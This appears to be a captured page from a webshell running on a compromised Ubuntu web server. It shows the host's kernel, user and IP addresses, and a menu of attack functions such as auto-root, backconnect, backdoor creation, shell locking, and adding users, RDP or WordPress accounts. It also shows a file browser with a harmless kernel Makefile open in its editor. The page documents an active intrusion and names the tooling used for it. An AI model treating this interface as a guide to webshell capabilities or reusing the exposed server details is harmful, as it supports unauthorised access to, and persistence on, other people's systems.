Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.119.133.168
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-4.15.0-213 /
drivers /
media /
[ HOME SHELL ]
Name
Size
Permission
Action
cec
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
dvb-core
[ DIR ]
drwxr-xr-x
dvb-frontends
[ DIR ]
drwxr-xr-x
firewire
[ DIR ]
drwxr-xr-x
i2c
[ DIR ]
drwxr-xr-x
mmc
[ DIR ]
drwxr-xr-x
pci
[ DIR ]
drwxr-xr-x
platform
[ DIR ]
drwxr-xr-x
radio
[ DIR ]
drwxr-xr-x
rc
[ DIR ]
drwxr-xr-x
spi
[ DIR ]
drwxr-xr-x
tuners
[ DIR ]
drwxr-xr-x
usb
[ DIR ]
drwxr-xr-x
v4l2-core
[ DIR ]
drwxr-xr-x
Kconfig
5.95
KB
-rw-r--r--
Makefile
794
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile for the kernel multimedia device drivers. # media-objs := media-device.o media-devnode.o media-entity.o # # I2C drivers should come before other drivers, otherwise they'll fail # when compiled as builtin drivers # obj-y += i2c/ tuners/ obj-$(CONFIG_DVB_CORE) += dvb-frontends/ # # Now, let's link-in the media core # ifeq ($(CONFIG_MEDIA_CONTROLLER),y) obj-$(CONFIG_MEDIA_SUPPORT) += media.o endif obj-$(CONFIG_VIDEO_DEV) += v4l2-core/ obj-$(CONFIG_DVB_CORE) += dvb-core/ # There are both core and drivers at RC subtree - merge before drivers obj-y += rc/ obj-$(CONFIG_CEC_CORE) += cec/ # # Finally, merge the drivers that require the core # obj-y += common/ platform/ pci/ usb/ mmc/ firewire/ spi/ obj-$(CONFIG_VIDEO_DEV) += radio/
Close